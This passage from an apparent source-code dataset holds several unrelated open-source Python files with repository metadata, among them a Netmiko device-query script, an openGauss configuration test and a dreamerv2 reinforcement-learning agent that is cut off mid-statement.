kwargs = {"org_id" : iOrgID}
# result = misp.search('events', published=0, **kwargs)
result = misp.search('events', published=1, **kwargs)
return result
except Exception as e:
print (e)
if __name__ == '__main__':
print("INIT")
| 37.694203
| 186
| 0.568995
|
794d98c3e55f0cef925c894773d4728356eb7d8e
| 1,158
|
py
|
Python
|
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | 3
|
2021-04-15T13:42:40.000Z
|
2021-04-16T15:44:59.000Z
|
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | null | null | null |
discernwise/commands/train.py
|
eeriksp/discernwise
|
26cdb86c0f069f1dd26b9b0c1338c7343208eeea
|
[
"MIT"
] | null | null | null |
from argparse import ArgumentParser
from commands.base import BaseCommand
from presentation.train import display_training_results
from services.train import TrainingConfig, train
class TrainCommand(BaseCommand):
"""
Use the given dataset to train a new model,
save the model to the given path
and display a GUI window with training statistics.
"""
name = 'train'
help = 'train a new model with the given dataset'
@staticmethod
def add_arguments(p: ArgumentParser) -> None:
p.add_argument('model_path', help='path where to save the new trained model')
p.add_argument('dataset_path', help='path to the dataset directory containing a subdirectory for each category')
p.add_argument('--epochs', type=int, default=2, dest="epochs", help='The number of epochs used for training')
@staticmethod
def build_config(args) -> TrainingConfig:
return TrainingConfig(model_path_str=args.model_path, data_dir_str=args.dataset_path, epochs=args.epochs)
@staticmethod
def handle(config: TrainingConfig) -> None:
results = train(config)
display_training_results(results)
| 37.354839
| 120
| 0.728843
|
794d994e6a654793b9be5dad209aa40c437a4b42
| 1,555
|
py
|
Python
|
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | 1
|
2016-03-01T14:39:17.000Z
|
2016-03-01T14:39:17.000Z
|
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | null | null | null |
wk8_hw/ex5_netmiko_sh_ver.py
|
philuu12/PYTHON_4_NTWK_ENGRS
|
ac0126ed687a5201031a6295d0094a536547cb92
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
"""
5. Use Netmiko to connect to each of the devices in the database.
Execute 'show version' on each device. Calculate the amount of time required to do this.
"""
from netmiko import ConnectHandler
from datetime import datetime
from net_system.models import NetworkDevice, Credentials
import django
import ex1_link_obj_2_credentials
def main():
django.setup()
# Load device info and credentials into database
ex1_link_obj_2_credentials.link_device_to_credentials()
devices = NetworkDevice.objects.all()
for a_device in devices:
if a_device.device_name and a_device.credentials:
start_time = datetime.now()
creds = a_device.credentials
username = creds.username
password = creds.password
remote_conn = ConnectHandler(device_type=a_device.device_type,
ip=a_device.ip_address,
username=username,
password=password,
port=a_device.port,
secret='')
# Print out 'show version' output
print
print '#' * 80
print ("'show version' output for device: %s" % a_device.device_name)
print '#' * 80
print remote_conn.send_command("show version")
# Print out elapsed time
print '#' * 80
print ("Elapsed time: " + str(datetime.now() - start_time))
print '#' * 80
if __name__ == "__main__":
main()
| 31.1
| 88
| 0.601286
|
794d99f9b2f1554757c8df78a1c60d89de6cd5ac
| 193
|
py
|
Python
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 454
|
2018-04-07T03:32:57.000Z
|
2020-08-17T19:56:22.000Z
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 254
|
2020-08-18T14:09:43.000Z
|
2022-03-28T11:30:51.000Z
|
data_collection/gazette/spiders/sc_paraiso.py
|
kaiocp/querido-diario
|
86004049c6eee305e13066cf3607d30849bb099a
|
[
"MIT"
] | 183
|
2018-04-11T15:09:37.000Z
|
2020-08-15T18:55:11.000Z
|
from gazette.spiders.base.fecam import FecamGazetteSpider
class ScParaisoSpider(FecamGazetteSpider):
name = "sc_paraiso"
FECAM_QUERY = "cod_entidade:190"
TERRITORY_ID = "4212239"
| 24.125
| 57
| 0.766839
|
794d9b0b5c574f8e6daac8f3f5543d271e6019e6
| 3,243
|
py
|
Python
|
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
openGaussBase/testcase/GUC/CONNECTIONAUTHENTICATION/Opengauss_Function_Guc_Connectionauthentication_Case0130.py
|
opengauss-mirror/Yat
|
aef107a8304b94e5d99b4f1f36eb46755eb8919e
|
[
"MulanPSL-1.0"
] | null | null | null |
"""
Copyright (c) 2022 Huawei Technologies Co.,Ltd.
openGauss is licensed under Mulan PSL v2.
You can use this software according to the terms and conditions of the Mulan PSL v2.
You may obtain a copy of Mulan PSL v2 at:
http://license.coscl.org.cn/MulanPSL2
THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
See the Mulan PSL v2 for more details.
"""
"""
Case Type : GUC
Case Name : 使用ALTER SYSTEM SET修改数据库参数authentication_timeout
Description :
1、查看authentication_timeout默认值;
source /opt/opengauss810/env
gs_guc check -D {cluster/dn1} -c authentication_timeout
2、使用ALTER SYSTM SET修改数据库参数authentication_timeout;
ALTER SYSTEM set authentication_timeout to '10min';
3、重启使其生效,校验预期结果;
Expect :
1、显示默认值;
2、参数修改成功;
3、重启成功,参数修改成功。
History :
"""
import unittest
from testcase.utils.CommonSH import CommonSH
from testcase.utils.Constant import Constant
from testcase.utils.Logger import Logger
from yat.test import Node
from yat.test import macro
COMMONSH = CommonSH('PrimaryDbUser')
class GucTest(unittest.TestCase):
def setUp(self):
self.log = Logger()
self.constant = Constant()
self.log.info('==Guc_Connectionauthentication_Case0130开始==')
self.db_user_node = Node(node='PrimaryDbUser')
status = COMMONSH.get_db_cluster_status()
self.assertTrue("Normal" in status or "Degraded" in status)
def test_startdb(self):
self.log.info("查询该参数默认值")
sql_cmd = COMMONSH.execut_db_sql('''show authentication_timeout;''')
self.log.info(sql_cmd)
self.assertEqual("1min", sql_cmd.split("\n")[-2].strip())
self.log.info("设置authentication_timeout")
sql_cmd = COMMONSH.execut_db_sql(
f'''ALTER SYSTEM set authentication_timeout to '10min';''')
self.log.info(sql_cmd)
self.assertIn("ALTER SYSTEM SET", sql_cmd)
self.log.info("重启使其生效,并校验预期结果")
COMMONSH.restart_db_cluster()
checksql = f"source {macro.DB_ENV_PATH};gsql " \
f"-d {self.db_user_node.db_name} " \
f"-p {self.db_user_node.db_port} " \
f"-c 'show authentication_timeout';"
self.log.info(checksql)
checkresult = self.db_user_node.sh(checksql).result()
self.assertIn('10min', checkresult)
def tearDown(self):
self.log.info("恢复默认值")
result = COMMONSH.execute_gsguc('set', self.constant.GSGUC_SUCCESS_MSG,
f"authentication_timeout=1min")
self.assertTrue(result)
COMMONSH.restart_db_cluster()
status = COMMONSH.get_db_cluster_status()
self.assertTrue("Normal" in status or "Degraded" in status)
self.log.info("查询该参数默认值")
sql_cmd = COMMONSH.execut_db_sql('''show authentication_timeout;''')
self.log.info(sql_cmd)
self.assertEqual("1min", sql_cmd.split("\n")[-2].strip())
self.log.info('==Guc_Connectionauthentication_Case0130完成==')
| 37.275862
| 84
| 0.655257
|
794d9ba91f84fed070a586dbccd061eb47efdcab
| 37,290
|
py
|
Python
|
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
dreamerv2/agent.py
|
footoredo/dreamerv2
|
493e1c0b92cf667a4b4fdcaf8f805273beeb165f
|
[
"MIT"
] | null | null | null |
from genericpath import exists
import re
import numpy as np
import tensorflow as tf
from tensorflow.keras import mixed_precision as prec
import common
import expl
class Agent(common.Module):
def __init__(self, config, logger, step, shapes):
self.config = config
self._logger = logger
self._num_act = shapes['action'][-1]
self._counter = step
self.step = tf.Variable(int(self._counter), tf.int64)
self.wm = WorldModel(self.step, shapes, self._num_act, config)
# print("wm:", self.wm.variables)
self._task_behavior = ActorCritic(config, self.step, self._num_act)
if config.expl_behavior == 'greedy':
self._expl_behavior = self._task_behavior
else:
reward = lambda seq: self.wm.heads['reward'](seq['feat']).mode()
inputs = config, self.wm, self._num_act, self.step, reward
self._expl_behavior = getattr(expl, config.expl_behavior)(*inputs)
def save_transformer(self, save_dir):
save_dir.mkdir(exist_ok=True)
self.wm.save_transformer(save_dir)
def load_transformer(self, load_dir):
self.wm.load_transformer(load_dir)
@tf.function
def policy(self, obs, state=None, mode='train'):
obs = tf.nest.map_structure(tf.tensor, obs)
tf.py_function(lambda: self.step.assign(
int(self._counter), read_value=False), [], [])
processed_obs = self.wm.preprocess(obs)
if state is None:
latent = self.wm.rssm.initial(len(obs['reward']))
prev_image = tf.zeros_like(processed_obs['image'])
action = tf.zeros((len(obs['reward']), self._num_act))
state = latent, prev_image, action
latent, prev_image, action = state
embed = self.wm.encoder(processed_obs)
t_embed = self.wm.rssm.transformer_encode(processed_obs, tf.zeros_like(embed))
sample = (mode == 'train') or not self.config.eval_state_mean
latent, _ = self.wm.rssm.obs_step(
latent, prev_image, action, processed_obs['image'], embed, t_embed, obs['is_first'], sample)
feat = self.wm.rssm.get_feat(latent)
if mode == 'eval':
actor = self._task_behavior.actor(feat)
action = actor.mode()
noise = self.config.eval_noise
elif mode == 'explore':
actor = self._expl_behavior.actor(feat)
action = actor.sample()
noise = self.config.expl_noise
elif mode == 'train':
actor = self._task_behavior.actor(feat)
action = actor.sample()
noise = self.config.expl_noise
elif mode == 'random':
actor = self._task_behavior.actor(feat)
action = actor.sample()
noise = 1.0
action = common.action_noise(action, noise, self.config.discrete)
# mat = np.eye(17)
# mat[7, 7] = 0
# mat[7, 0] = 1 # replace place_stone to
# mat = tf.constant(mat, dtype=action.dtype)
# action = tf.matmul(action, mat)
outputs = {'action': action}
state = (latent, processed_obs['image'], action)
return outputs, state
@tf.function(experimental_compile=False)
def train(self, data, state=None):
print("in agent train()", flush=True)
metrics = {}
# for k, v in data.items():
# print(k, type(v))
state, outputs, mets, model_loss, prior = self.wm.train(data, state)
metrics.update(mets)
start = outputs['post']
if self.config.make_graph:
return model_loss
# print("self.wm.train states:", flush=True)
# for k, v in start.items():
# p = 1
# for d in v.shape:
# p *= d
# print(k, v.shape, p)
# for k, v in start.items():
# print(k, v.device)
# return model_loss, prior
def reward_fn(seq):
if self.config.use_transformer_reward:
print("seq['feat'].shape", seq['feat'].shape, flush=True) # [length, batch, ...]
dists = self.wm.heads['decoder'](seq['feat'])
imagined_obs = dict()
for key, dist in dists.items():
imagined_obs[key] = dist.mode()
if self.wm.rssm.use_independent_transformer_encoder:
_embed = self.wm.rssm.transformer_encode(imagined_obs)
else:
_embed = self.wm.encoder(imagined_obs)
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
out = self.wm.rssm.calc_independent_transformer_hidden(swap(_embed), swap(seq['action']),
swap(tf.zeros_like(seq['action'])[:, :, 0]), training=True, return_weight=False)
r = swap(self.wm.heads['transformer_reward'](out).mode())
else:
r = self.wm.heads['reward'](seq['feat']).mode()
if self.config.use_int_reward:
for source in self.config.int_reward_sources:
coef = self.config.int_reward_coef.get(source, 1.0)
print(f'int reward source: {source} coef: {coef}')
r += coef * self.wm.heads[f'int_reward_{source}'](seq['feat']).mode()
return r
if not self.config.no_behavior_training:
metrics.update(self._task_behavior.train(
self.wm, start, data['is_terminal'], reward_fn))
if self.config.expl_behavior != 'greedy':
mets = self._expl_behavior.train(start, outputs, data)[-1]
metrics.update({'expl_' + key: value for key, value in mets.items()})
print("out agent train()", flush=True)
return state, metrics
@tf.function(experimental_compile=False)
def report(self, data, return_data=False):
print(f"in report(), return_data={return_data}")
report = {}
data = self.wm.preprocess(data)
for k, v in data.items():
print(k, v.shape, flush=True)
rtn = None
for key in data:
if re.match(self.config.decoder.cnn_keys, key):
name = key.replace('/', '_')
pred_dict = self.wm.video_pred(data, key, self._task_behavior if not self.config.no_behavior_training else None)
report[f'openl_{name}'] = pred_dict['images']
if return_data:
# print("save pred data")
rtn = pred_dict
if return_data:
return report, rtn
else:
return report
class WorldModel(common.Module):
def __init__(self, step, shapes, num_actions, config):
self.step = step
self.config = config
self.encoder = common.Encoder(**config.encoder)
self.rssm = common.EnsembleRSSM(config, encoder=None, num_actions=num_actions, **config.rssm)
self.heads = {}
def add_head(_name, _module, *args, **kwargs):
if config.use_head_mask:
self.heads[_name] = common.MaskLayer(lambda: _module(*args, **kwargs), self.rssm.get_mask(_name), gradient_mask=config.head_mask.gradient)
else:
self.heads[_name] = _module(*args, **kwargs)
add_head('decoder', common.Decoder, shapes, **config.decoder)
# self.heads['decoder'] = common.Decoder(shapes, **config.decoder)
add_head('reward', common.MLP, [], **config.reward_head)
# self.heads['reward'] = common.MLP([], **config.reward_head)
self._use_transformer_reward_head = config.rssm.use_transformer_reward_head and config.rssm.use_transformer
if self._use_transformer_reward_head:
add_head('transformer_reward', common.MLP, [], **config.reward_head)
# self.heads['transformer_reward'] = common.MLP([], **config.reward_head)
self._myopic_prediction = config.myopic_prediction
if self._myopic_prediction:
add_head('myopic_reward', common.MLP, [], **config.reward_head)
self._use_int_reward = config.use_int_reward
if self._use_int_reward:
print("use int reward!", flush=True)
self._int_reward_sources = config.int_reward_sources
for source in self._int_reward_sources:
add_head(f'int_reward_{source}', common.MLP, [], **config.reward_head)
if source == 'attention':
self.rssm.set_importance_head(self.heads['int_reward_attention'])
# self.heads['int_reward'] = common.MLP([], **config.reward_head)
# print("wm.reward:", self.heads['reward'].variables)
# self._use_attention_int_reward = config.use_attention_int_reward
if config.pred_discount:
add_head('discount', common.MLP, [], **config.discount_head)
# self.heads['discount'] = common.MLP([], **config.discount_head)
for name in config.grad_heads:
assert name in self.heads, name
self.model_opt = common.Optimizer('model', **config.model_opt)
self._bootstrap_frames = config.bootstrap_frames
self._video_pred_batches = config.video_pred_batches
# self._running_stats = {}
def save_transformer(self, save_dir):
self.rssm.save_transformer(save_dir)
def load_transformer(self, load_dir):
self.rssm.load_transformer(load_dir)
def train(self, data, state=None):
print("in wm train()", flush=True)
with tf.GradientTape() as model_tape:
model_loss, state, outputs, metrics, prior = self.loss(data, state)
print("model_loss", model_loss, flush=True)
print(metrics.keys(), flush=True)
for k, v in metrics.items():
print(k, v, flush=True)
# print("1", flush=True)
modules = [self.encoder, self.rssm, *self.heads.values()]
# print("2", flush=True)
metrics.update(self.model_opt(model_tape, model_loss, modules))
print("out wm train()", flush=True)
return state, outputs, metrics, model_loss, prior
def calc_t_importance(self, t_weight, truth_reward, pred_reward, t_pred_reward, myopic_pred_reward, st_weight, source=None, reduction=None):
print("in calc_t_importance")
print("t_weight.shape", t_weight.shape)
print("truth_reward.shape", truth_reward.shape)
print("pred_reward.shape", pred_reward.shape)
print("t_pred_reward.shape", t_pred_reward.shape)
if source is None:
source = self.config.future_importance_source
if reduction is None:
reduction = self.config.future_importance_reduction
if source == 'state':
t_weight = tf.identity(st_weight) # [batch, length, num_heads, length], logits
else:
t_weight = tf.identity(t_weight)
t_weight = tf.nn.softmax(t_weight, axis=-1) # [batch, length, num_heads, length], weight
if reduction == 'mean':
t_weight = tf.reduce_mean(t_weight, -2) # [batch, length, length]
elif reduction == 'max':
t_weight = tf.reduce_max(t_weight, -2) # [batch, length, length]
else:
raise NotImplementedError
identity = tf.eye(t_weight.shape[1]) # [length, length]
identity = tf.expand_dims(identity, 0) # [1, length, length]
t_weight = tf.multiply(1 - identity, t_weight) # only cares attention in the past steps
if source == 'reward':
item = truth_reward
elif source == 'abs_reward':
item = tf.abs(truth_reward)
elif source == 'reward_diff':
item = tf.abs(pred_reward - t_pred_reward)
elif source == 'reward_diff_myopic':
item = tf.abs(myopic_pred_reward - t_pred_reward)
elif source == 'state':
item = tf.ones_like(truth_reward)
else:
raise NotImplementedError
t_importance = tf.multiply(tf.expand_dims(item, -1), t_weight) # [batch, length, length] -> pairwise importance
return t_importance
def loss(self, data, state=None):
# print("in loss()", flush=True)
data = self.preprocess(data)
# print("1", flush=True)
embed = self.encoder(data)
transformer_embed = self.rssm.transformer_encode(data, tf.zeros_like(embed))
# print("2", flush=True)
post, prior, state_transformer_stats = self.rssm.observe(
embed, transformer_embed, data['image'], data['action'], data['is_first'], training=True, state=state, transformer_weight=True)
# print("3", flush=True)
kl_loss, kl_value = self.rssm.kl_loss(post, prior, **self.config.kl)
assert len(kl_loss.shape) == 0
likes = {}
losses = {'kl': kl_loss}
if state_transformer_stats is not None:
state_transformer_kl_loss, state_transformer_kl_value = self.rssm.kl_loss(post, state_transformer_stats, forward=False, balance=1.0, free=0.0, free_avg=True)
losses["state_transformer_kl"] = state_transformer_kl_loss
feat = self.rssm.get_feat(post)
# print(feat.shape)
myopic_pred_reward = None
for name, head in self.heads.items():
if name.startswith("int_reward"):
continue
if name == "transformer_reward":
# print("transformer_reward in loss", post['t_transformer'].shape, post['t_transformer'])
dist = head(post['t_transformer'])
t_pred_reward = tf.stop_gradient(dist.mode())
like = tf.cast(dist.log_prob(data["reward"]), tf.float32)
losses["transformer_reward"] = -like.mean()
elif name == 'myopic_reward':
dist = head(post['myopic_out'])
myopic_pred_reward = tf.stop_gradient(dist.mode())
like = tf.cast(dist.log_prob(data["reward"]), tf.float32)
losses["myopic_reward"] = -like.mean()
else:
grad_head = (name in self.config.grad_heads)
inp = feat if grad_head else tf.stop_gradient(feat)
out = head(inp)
dists = out if isinstance(out, dict) else {name: out}
for key, dist in dists.items():
if key == 'reward':
pred_reward = tf.stop_gradient(dist.mode())
# print(key, data[key].shape, dist.mean().shape)
like = tf.cast(dist.log_prob(data[key]), tf.float32)
# if not key in self._running_stats:
# self._running_stats[key] = common.RunningStats(like.shape)
# self._running_stats[key].push(-like)
likes[key] = like
losses[key] = -like.mean()
metrics = {}
if 't_weight_0' in post:
# t_weight = tf.identity(post[f't_weight_{self.rssm.transformer_num_layers - 1}']) # [batch, length, num_heads, length], logits
# t_weight = tf.nn.softmax(t_weight, axis=-1) # [batch, length, num_heads, length], weight
# t_weight = tf.reduce_mean(t_weight, -2) # [batch, length, length]
# identity = tf.eye(t_weight.shape[1]) # [length, length]
# identity = tf.expand_dims(identity, 0) # [1, length, length]
# t_weight = tf.multiply(1 - identity, t_weight) # only cares attention in the past steps
# if self.config.future_importance_source == 'reward':
# source = data['reward']
# elif self.config.future_importance_source == 'abs_reward':
# source = tf.abs(data['reward'])
# elif self.config.future_importance_source == 'reward_diff':
# source = tf.abs(pred_reward - t_pred_reward)
# else:
# raise NotImplementedError
# t_importance = tf.multiply(tf.expand_dims(source, -1), t_weight) # [batch, length, length] -> pairwise importance
rt_weights = post[f't_weight_{self.rssm._transformer.num_layers - 1}']
try:
st_weights = post[f't_state_weight_{self.rssm._transformer.num_layers - 1}']
except KeyError:
st_weights = None
t_importance = self.calc_t_importance(rt_weights, data['reward'], pred_reward, t_pred_reward, myopic_pred_reward, st_weights)
if self._use_int_reward:
def _add_int_reward_loss(_source, _int_reward):
key = f'int_reward_{_source}'
inp = tf.stop_gradient(feat)
dist = self.heads[key](inp)
like = tf.cast(dist.log_prob(_int_reward), tf.float32)
losses[key] = -like.mean()
metrics[f'{key}_max'] = _int_reward.max()
metrics[f'{key}_min'] = _int_reward.min()
metrics[f'{key}_mean'] = _int_reward.mean()
metrics[f'{key}_std'] = _int_reward.std()
if 'expl' in self._int_reward_sources:
model_like = 0
print("in calc int from expl")
for k, v in likes.items():
_v = (v.mean() - v) / (v.std() + 1e-8)
mask = tf.cast(_v > 1, tf.float32)
_v = mask * _v # only keep significant reward (> 1 std)
print(k, _v.shape)
metrics[f'{k}_like_max'] = _v.max()
metrics[f'{k}_like_min'] = _v.min()
metrics[f'{k}_like_std'] = _v.std()
model_like += self.config.int_reward_scales.get(k, 0.0) * _v
_add_int_reward_loss('expl', model_like)
if 'attention' in self._int_reward_sources:
t_int_reward = tf.reduce_sum(t_importance, -2) # [batch, length]
_add_int_reward_loss('attention', tf.stop_gradient(t_int_reward))
# if self._use_int_reward and 'expl' in self._int_reward_sources:
# model_like = 0
# print("in calc int from expl")
# for k, v in likes.items():
# _v = (v.mean() - v) / (v.std() + 1e-8)
# mask = tf.cast(_v > 1, tf.float32)
# _v = mask * _v # only keep significant reward (> 1 std)
# print(k, _v.shape)
# metrics[f'{k}_like_max'] = _v.max()
# metrics[f'{k}_like_min'] = _v.min()
# metrics[f'{k}_like_std'] = _v.std()
# model_like += self.config.int_reward_scales.get(k, 0.0) * _v
# int_reward = model_like
# # data["int_reward"] = int_reward
# inp = tf.stop_gradient(feat)
# # inp = feat
# dist = self.heads["int_reward_expl"](inp)
# like = tf.cast(dist.log_prob(int_reward), tf.float32)
# # print("model_like", model_like.shape, inp.shape, like.shape, flush=True)
# likes["int_reward_expl"] = like
# losses["int_reward_expl"] = -like.mean()
# metrics['int_reward_expl_max'] = int_reward.max()
# metrics['int_reward_expl_min'] = int_reward.min()
# metrics['int_reward_expl_mean'] = int_reward.mean()
# metrics['int_reward_expl_std'] = int_reward.std()
# if self.rssm.use_transformer:
# losses['transformer_weight_norm'] = 0
# for i in range(self.rssm.transformer_num_layers):
# losses['transformer_weight_norm'] += post[f't_weight_norm_{i}'].mean()
model_loss = 0
# if self._use_int_reward:
# model_loss += losses["int_reward"]
# print("losses:", flush=True)
# model_loss = tf.zeros([], dtype=tf.float32)
for k, v in losses.items():
# print(k, v.shape, v, self.config.loss_scales.get(k, 1.0), flush=True)
model_loss += self.config.loss_scales.get(k, 1.0) * v
# model_loss = sum(
# self.config.loss_scales.get(k, 1.0) * v for k, v in losses.items())
outs = dict(
embed=embed, feat=feat, post=post,
prior=prior, likes=likes, kl=kl_value)
metrics.update({f'{name}_loss': value for name, value in losses.items()})
metrics['model_kl'] = kl_value.mean()
if state_transformer_stats is not None:
metrics['state_transformer_kl_value'] = state_transformer_kl_value.mean()
metrics['prior_ent'] = self.rssm.get_dist(prior).entropy().mean()
metrics['post_ent'] = self.rssm.get_dist(post).entropy().mean()
# if self.rssm.use_transformer:
# for i in range(self.rssm.transformer_num_layers):
# metrics[f'transformer_weight_norm_{i}'] = tf.sqrt(post[f't_weight_norm_{i}']).mean()
# def get_last(k, v):
# if k.startswith('t_'):
# return v[-1]
# else:
# return v[:, -1]
last_state = {k: v[:, -1] for k, v in post.items()}
# print("out loss()", flush=True)
return model_loss, last_state, outs, metrics, prior
def imagine(self, policy, start, is_terminal, horizon):
flatten = lambda x: x.reshape([-1] + list(x.shape[2:]))
# for k, v in start.items():
# print(k, type(v))
# if type(v) == list:
# print(len(v), v[0].shape)
# else:
# print(v.shape)
# print("in imagine")
# for k, v in start.items():
# print(k, v.device)
# def _flatten(k, v):
# if k.startswith('t_'):
start = {k: flatten(v) for k, v in start.items()}
start['feat'] = self.rssm.get_feat(start)
start['action'] = tf.zeros_like(policy(start['feat']).mode())
# print("in imagine:", start.keys()) # dict_keys(['logit', 'stoch', 'deter', 'feat', 'action'])
# print("in imagine:", start.items())
seq = {k: [v[:]] for k, v in start.items() if not k.startswith('t_')}
t_states = {k: v[:] for k, v in start.items() if k.startswith('t_')}
for h in range(horizon):
action = policy(tf.stop_gradient(seq['feat'][-1])).sample()
states = {k: v[-1][:] for k, v in seq.items()}
states.update({k: v[:] for k, v in t_states.items()})
state = self.rssm.img_step(states, action[:], training=False)
feat = self.rssm.get_feat(state)
print("horizon", h)
for key, value in {**state, 'action': action, 'feat': feat}.items():
# print()
if key.startswith('t_'):
t_states[key] = value
else:
seq[key].append(value)
print(key, value.shape)
seq = {k: tf.stack(v, 0) for k, v in seq.items()}
if 'discount' in self.heads:
disc = self.heads['discount'](seq['feat']).mean()
if is_terminal is not None:
# Override discount prediction for the first step with the true
# discount factor from the replay buffer.
true_first = 1.0 - flatten(is_terminal).astype(disc.dtype)
true_first *= self.config.discount
disc = tf.concat([true_first[:][None], disc[1:]], 0)
else:
disc = self.config.discount * tf.ones(seq['feat'].shape[:-1])
seq['discount'] = disc
# Shift discount factors because they imply whether the following state
# will be valid, not whether the current state is valid.
seq['weight'] = tf.math.cumprod(
tf.concat([tf.ones_like(disc[:1]), disc[:-1]], 0), 0)
return seq
@tf.function(experimental_compile=False)
def preprocess(self, obs):
dtype = prec.global_policy().compute_dtype
obs = obs.copy()
for key, value in obs.items():
if key.startswith('log_'):
continue
if value.dtype == tf.int32:
value = value.astype(dtype)
if value.dtype == tf.uint8:
value = value.astype(dtype) / 255.0 - 0.5
obs[key] = value
obs['reward'] = {
'identity': tf.identity,
'sign': tf.sign,
'tanh': tf.tanh,
}[self.config.clip_rewards](obs['reward'])
obs['discount'] = 1.0 - obs['is_terminal'].astype(dtype)
obs['discount'] *= self.config.discount
return obs
@tf.function(experimental_compile=False)
def video_pred(self, data, key, agent=None):
print('data.keys()', data.keys())
vb = self._video_pred_batches
bf = min(self._bootstrap_frames, data['action'].shape[1] - 1)
print("bootstrap_frames:", bf, data['action'].shape[1])
decoder = self.heads['decoder']
truth = data[key][:vb] + 0.5
embed = self.encoder(data)
transformer_embed = self.rssm.transformer_encode(data, tf.zeros_like(embed))
states, _prior, _ = self.rssm.observe(
embed[:vb, :bf],
transformer_embed[:vb, :bf] if transformer_embed is not None else None,
data['image'][:vb, :bf],
data['action'][:vb, :bf],
data['is_first'][:vb, :bf],
training=False,
transformer_weight=True
)
state_feat = self.rssm.get_feat(states)
_prior_feat = self.rssm.get_feat(_prior)
recon = decoder(state_feat)[key].mode()[:vb]
recon_reward = self.heads['reward'](state_feat).mode()[:vb]
recon_discount = self.heads['discount'](state_feat).mode()[:vb]
if self._use_transformer_reward_head:
recon_transformer_reward = self.heads['transformer_reward'](states['t_transformer']).mode()[:vb]
if self._myopic_prediction:
recon_myopic_reward = self.heads['myopic_reward'](states['myopic_out']).mode()[:vb]
prior_recon = decoder(_prior_feat)[key].mode()[:vb]
prior_recon_reward = self.heads['reward'](_prior_feat).mode()[:vb]
prior_recon_discount = self.heads['discount'](_prior_feat).mode()[:vb]
init = {k: v[:, -1] for k, v in states.items()}
prior = self.rssm.imagine(data['action'][:vb, bf:], training=False, state=init, transformer_weight=True)
prior_feat = self.rssm.get_feat(prior)
openl = decoder(prior_feat)[key].mode()
openl_reward = self.heads['reward'](prior_feat).mode()[:vb]
openl_discount = self.heads['discount'](prior_feat).mode()[:vb]
if self._use_transformer_reward_head:
if 't_transformer' in prior:
openl_transformer_reward = self.heads['transformer_reward'](prior['t_transformer']).mode()[:vb]
else:
openl_transformer_reward = tf.zeros_like(openl_reward)
model_transformer_reward = tf.concat([recon_transformer_reward, openl_transformer_reward], 1)
if self._myopic_prediction:
openl_myopic_reward = self.heads['myopic_reward'](prior['myopic_out']).mode()[:vb]
model_myopic_reward = tf.concat([recon_myopic_reward, openl_myopic_reward], 1)
else:
model_myopic_reward = None
model_reward = tf.concat([recon_reward, openl_reward], 1)
model_discount = tf.concat([recon_discount, openl_discount], 1)
model = tf.concat([recon[:, :bf] + 0.5, openl + 0.5], 1)
error = (model - truth + 1) / 2
video = tf.concat([truth, model, error], 2)
prior_video = prior_recon[:, :bf] + 0.5 # [B, T, H, W, C]
B, T, H, W, C = video.shape
actions = data['action'][:vb]
truth_reward = data['reward'][:vb]
truth_discount = data['discount'][:vb]
feat = tf.concat([state_feat, prior_feat], 1)
ret_dict = {
"images": video.transpose((1, 2, 0, 3, 4)).reshape((T, H, B * W, C)),
"prior_images": prior_video,
"rewards": {
"truth": truth_reward,
"model": model_reward,
"prior": prior_recon_reward
},
"discounts": {
"truth": truth_discount,
"model": model_discount,
"prior": prior_recon_discount
},
"actions": actions,
"is_first": data['is_first'][:vb],
"feat": feat,
}
if 'target' in data.keys():
truth_dir = data['target'][:bf]
try:
model_dir = decoder(feat)['target'].mode()
ret_dict['target'] = {
'truth': truth_dir,
'model': model_dir
}
except KeyError:
pass
if self._use_transformer_reward_head:
ret_dict["rewards"]["transformer"] = model_transformer_reward
if self._myopic_prediction:
ret_dict["rewards"]["myopic"] = model_myopic_reward
if self.config.rssm.use_transformer:
ret_dict["transformer_weights"] = dict()
for i in range(self.rssm._transformer.num_layers):
weight_recon = states[f"t_weight_{i}"]
try:
weight_openl = prior[f"t_weight_{i}"]
weight = tf.concat([weight_recon, weight_openl], 1)
except KeyError:
weight = weight_recon
ret_dict["transformer_weights"][i] = weight
if "t_state_weight_0" in states:
ret_dict["state_transformer_weights"] = dict()
for i in range(self.rssm._state_transformer.num_layers):
ret_dict["state_transformer_weights"][i] = states[f"t_state_weight_{i}"]
t_importance = self.calc_t_importance(ret_dict["transformer_weights"][self.rssm._transformer.num_layers - 1][:, :bf],
truth_reward[:, :bf], model_reward[:, :bf], model_transformer_reward[:, :bf], model_myopic_reward[:, :bf] if model_myopic_reward is not None else None,
